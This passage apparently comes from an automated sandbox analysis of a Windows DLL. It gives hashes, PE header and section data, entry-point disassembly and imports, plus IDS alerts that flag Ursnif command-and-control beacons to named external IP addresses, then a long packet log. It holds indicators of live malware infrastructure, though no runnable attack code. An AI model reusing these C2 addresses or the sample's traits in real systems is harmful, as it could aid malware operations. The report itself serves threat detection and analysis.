SHA-512: | 6C5C704F14497B4292EE0FBC851A34305F2600FCBEDE5BA746F764F4926518B47AEAC1EE3100A8954EBA1F5241FADDA18B4EFF8E4620135C7BEF41D7D8D29B68 |
Malicious: | false |
Preview: |
C:\Users\user\Documents\20220525\PowerShell_transcript.468325.mIKzyOcS.20220525112740.txt
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1367 |
Entropy (8bit): | 5.377240760406581 |
Encrypted: | false |
SSDEEP: | 24:BxSA/l7vBZ0x2DOXUWc15RfLCH94qWMHjeTKKjX4CIym1ZJXHHk15RfLCH94DGnx:BZ5vj0oO815R894tMqDYB1ZBk15R894a |
MD5: | 7ACB5D1BD81125AB675652E41023E0F0 |
SHA1: | 9FC97485AC5DAAACC281A2B8EFB5EF12596C3F64 |
SHA-256: | 30FE99D16BFDC9CEFF28EF81808969276F3F8651FE14126D5486D7C2B0C4B335 |
SHA-512: | ACF043703C782764BB648C1985A7A6704F95C8E8A2C8082B71CB04166DC3E62F178FA4B96EF2F73AC30980D406A207E3C27CB42BE96AC69EC0A4BDAFF70072F3 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.281202320961198 |
TrID: |
File name: | zs5n5sI6N2.dll |
File size: | 438272 |
MD5: | 9ce6868cb546819a7ba2fc27f91a3777 |
SHA1: | 6052120b0375f44ede4985ad98f7bd89beb70c2b |
SHA256: | fc4bee1a68545b7067fad93ba74478641acd683117f9fe478a4941d7146db959 |
SHA512: | ac6ae26a27242161fe48431916c8c7bfe2dea1b8f0b8ec1e07c30e4990d6cdb0c383ee846ba319eef082a50a90a858d5cb10f7fa4b00acbf0717b866105c51f6 |
SSDEEP: | 6144:SpmLsr+3OV4DS3D7qBWLARf3RBsFuIiUkok9dHGYgkKeOSnKM66C+m6iMabuFGGK:FsBUSzjLIRBMkf9dHLpKepKr6CvXG |
TLSH: | 9894F14897685D66D84647370CE1971EFCE7FE2EE63B7ABE20642C8FF95B0104512B0A |
File Content Preview: | MZ......................@...........................................................(.......0...w+!.W....]v...............4.....Y^........7.......x.........<.............A.............., ......,%.......{.......7.o.......O.....4.......5.......@.....Rich... |
Icon Hash: | 9068eccc64f6e2ad |
Entrypoint: | 0x401520 |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x3EC34607 [Thu May 15 07:47:19 2003 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | 8000dfa78ad003480e4532227762516a |
Instruction |
---|
push ebp |
mov ebp, esp |
inc edx |
add ecx, FFFFFFFFh |
call 00007FD190FDD4AAh |
pop eax |
pop eax |
mov dword ptr [004136F4h], eax |
mov edx, dword ptr [00413810h] |
sub edx, 00005289h |
call edx |
mov eax, ebx |
mov dword ptr [004136F0h], eax |
mov eax, esi |
mov dword ptr [004136E8h], eax |
mov dword ptr [004136F8h], ebp |
mov dword ptr [004136ECh], edi |
add dword ptr [004136F8h], 00000004h |
loop 00007FD190FDD457h |
mov dword ptr [ebp+00h], eax |
nop |
nop |
or ebx, dword ptr [ebp+449BB717h] |
fsub st(0), st(5) |
push edx |
pop edx |
jnp 00007FD190FDD4F3h |
out dx, eax |
push ebp |
push ebx |
test byte ptr [ecx+7B670685h], cl |
inc esp |
cmp al, BBh |
push ebx |
mov cl, C6h |
das |
mov ah, 17h |
wait |
cmpsb |
jnbe 00007FD190FDD4CCh |
cmpsb |
fst qword ptr [edi-25h] |
out 23h, al |
jnbe 00007FD190FDD4B2h |
jno 00007FD190FDD503h |
salc |
dec byte ptr [edx+67779444h] |
pop eax |
cmp al, 97h |
outsd |
ror byte ptr [ecx+ecx*2], FFFFFFD3h |
inc edx |
inc ebx |
mov edx, 8F4D5DB0h |
add bl, ch |
mov ebp, 10EBFDC4h |
jmp far fword ptr [esi] |
push ecx |
mov ch, ah |
push ebx |
inc esi |
xchg eax, ebp |
mov esp, 2E29FAE8h |
cmc |
test al, BFh |
scasd |
fucom st(2), st(0) |
movsd |
mov ebp, 3238AE00h |
retf D184h |
mov ebx, 568788E4h |
insd |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd8a0 | 0x8c | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x61000 | 0x9f28 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6b000 | 0xf3c | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0x7c | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0xb8c0 | 0xc000 | False | 0.0830688476562 | data | 1.12975257539 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
.rdata | 0xd000 | 0xbea | 0x1000 | False | 0.2861328125 | data | 4.80028446978 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xe000 | 0x7b80 | 0x6000 | False | 0.380167643229 | data | 5.99739209586 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.crt | 0x16000 | 0x1dc01 | 0x1e000 | False | 0.988452148437 | data | 7.98104004555 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.erloc | 0x34000 | 0x2c91e | 0x2d000 | False | 0.988232421875 | data | 7.98142116636 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.rsrc | 0x61000 | 0x9f28 | 0xa000 | False | 0.602783203125 | data | 6.51666400073 | IMAGE_SCN_LNK_REMOVE, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_TYPE_GROUP, IMAGE_SCN_LNK_INFO, IMAGE_SCN_MEM_PROTECTED, IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_NO_DEFER_SPEC_EXC, IMAGE_SCN_MEM_READ |
.reloc | 0x6b000 | 0x133a | 0x2000 | False | 0.218994140625 | data | 3.75989927364 | IMAGE_SCN_TYPE_NOLOAD, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_MEM_FARDATA, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_OTHER, IMAGE_SCN_LNK_INFO, IMAGE_SCN_LNK_OVER, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_LNK_COMDAT, IMAGE_SCN_GPREL, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_BITMAP | 0x61360 | 0x666 | data | English | United States |
RT_ICON | 0x619c8 | 0x485d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States |
RT_ICON | 0x66228 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544 | English | United States |
RT_ICON | 0x687d0 | 0xea8 | data | English | United States |
RT_ICON | 0x69678 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States |
RT_ICON | 0x69f20 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States |
RT_DIALOG | 0x6a488 | 0xb4 | data | English | United States |
RT_DIALOG | 0x6a540 | 0x120 | data | English | United States |
RT_DIALOG | 0x6a660 | 0x158 | data | English | United States |
RT_DIALOG | 0x6a7b8 | 0x202 | data | English | United States |
RT_DIALOG | 0x6a9c0 | 0xf8 | data | English | United States |
RT_DIALOG | 0x6aab8 | 0xa0 | data | English | United States |
RT_DIALOG | 0x6ab58 | 0xee | data | English | United States |
RT_GROUP_ICON | 0x6ac48 | 0x4c | data | English | United States |
RT_VERSION | 0x6ac98 | 0x290 | MS Windows COFF PA-RISC object file | English | United States |
DLL | Import |
---|---|
ADVAPI32.dll | EnumServicesStatusExW, RegGetValueA, GetSidSubAuthorityCount |
msvcrt.dll | fgetwc, strcoll |
USER32.dll | GetClassNameA, LockWorkStation, GetMessagePos, GetWindowWord, IsWindow, GetClientRect, GetUpdateRgn |
GDI32.dll | GetCharWidthFloatA, GetTextMetricsW, ExtEscape |
OLEAUT32.dll | LoadTypeLibEx |
KERNEL32.dll | GetBinaryTypeA, GetModuleFileNameA, LocalHandle, GetThreadLocale, GetFileTime, GlobalFlags, EnumResourceTypesA, GetCommState, GlobalFree |
Description | Data |
---|---|
LegalCopyright | A Company. All rights reserved. |
InternalName | |
FileVersion | 1.0.0.0 |
CompanyName | A Company |
ProductName | |
ProductVersion | 1.0.0.0 |
FileDescription | |
OriginalFilename | myfile.exe |
Translation | 0x0409 0x04b0 |
Language of compilation system | Country where language is spoken |
---|---|
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
05/25/22-11:27:05.996967 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49765 | 80 | 192.168.2.4 | 13.107.42.16 |
05/25/22-11:27:05.996967 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49765 | 80 | 192.168.2.4 | 13.107.42.16 |
05/25/22-11:27:28.182548 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
05/25/22-11:27:27.011665 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 25, 2022 11:27:27.299351931 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.299371004 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.299531937 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.299571991 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.299608946 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.299635887 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.299660921 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.299679041 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.299736023 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.299742937 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.299978971 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.300035954 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.300059080 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.300074100 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.300132990 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.300144911 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.313472986 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.313582897 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.313654900 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.313709974 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.313772917 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.313817024 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.313823938 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.314618111 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.316514015 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.317565918 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.317642927 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.317699909 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.317774057 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.317840099 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.317894936 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.317904949 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.317912102 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.318012953 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318082094 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318135023 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318200111 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.318206072 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.318223000 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318298101 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318356037 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318419933 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318483114 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.318486929 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318492889 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.318542004 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318634033 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318697929 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318756104 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.318762064 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318799973 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.318815947 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318888903 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.318898916 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318938971 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318978071 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.319004059 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.319036961 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.319045067 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.319080114 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.319112062 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.319120884 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.319128990 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.327774048 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.327832937 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.327896118 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.327934980 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.327992916 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.327999115 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.328049898 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.328063011 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.328105927 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.328119040 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.328129053 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.328141928 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.328536034 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.331705093 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.331840992 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.331969023 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.331995010 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.332029104 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.332056046 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.332082987 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.332109928 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.332129002 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.332129955 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.332139969 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.332144976 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.332158089 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.334320068 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.334352970 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.334379911 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.334400892 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.334422112 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.334444046 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.335597038 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.335628033 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.335655928 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.335674047 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.335725069 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.335747957 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.337210894 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337244987 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337271929 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337301016 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337321997 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337347984 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337374926 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337393999 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.337400913 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337405920 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.337424994 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.337430954 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337431908 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.337450981 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337559938 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.337625980 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337657928 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337683916 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337712049 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337724924 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.337732077 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337759018 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.337759972 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337789059 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337822914 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.337835073 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.337841034 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337861061 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.337869883 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337889910 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.337902069 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337922096 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337946892 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.337950945 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337955952 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.337976933 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.338004112 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.338010073 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.338032961 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.338037014 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.338063002 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.338067055 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.338088036 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.338113070 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.338114023 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.338125944 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.338145971 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.338174105 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.338200092 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.338282108 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.342243910 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.342287064 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.342312098 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.342333078 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.342334986 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.342350006 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.342351913 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.342397928 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.345252991 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.345288992 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.345314980 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.345331907 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.345349073 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.345366001 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.345438004 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.345510006 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.346698046 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.346730947 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.346755028 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.346777916 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.346795082 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.346807957 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.346816063 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.346836090 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.346839905 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.346863985 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.346888065 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.346889019 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
